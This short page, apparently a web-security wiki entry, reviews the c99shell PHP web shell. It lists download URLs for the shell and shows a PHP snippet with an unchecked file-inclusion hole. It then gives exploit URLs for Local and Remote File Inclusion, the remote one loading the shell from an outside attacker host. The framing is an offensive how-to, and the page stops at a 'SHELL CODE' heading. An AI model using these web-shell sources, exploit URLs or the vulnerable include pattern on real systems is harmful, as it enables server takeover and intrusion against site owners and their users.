C99 Shell review

Description

c99shell is a one file PHP script that can be called:

• locally via a Local File Inclusion (LFI) attack if the file has been copied on a compromised machine
• remotely via a Remote File Inclusion (RFI) attack is the web application is vulnerable to such an attack.

Download

• http://www.phpshell.net/shell/c99.txt
• http://www.localroot.net/ce.txt

Usage

Local File Inclusion (LFI)

Suppose there is a vulnerable web site that contains the following code (index.php):

<?php
if(isset($_GET["page"])) {
  require_once($_GET["page"]);
}
...
?>

You can exploit a Local File Inclusion (LFI) attack by calling C99shell this way:

http://www.somevulnerablesite/index.php?page=c99.txt

Remote File Inclusion (RFI)

Suppose there is a vulnerable web site that contains the following code (index.php):

<?php
if(isset($_GET["page"])) {
  require_once($_GET["page"]);
}
...
?>

You can exploit a Remote File Inclusion (RFI) attack by calling C99shell this way:

http://www.somevulnerablesite/index.php?page=http://www.hackerssite/phpshells/c99.txt 

SHELL CODE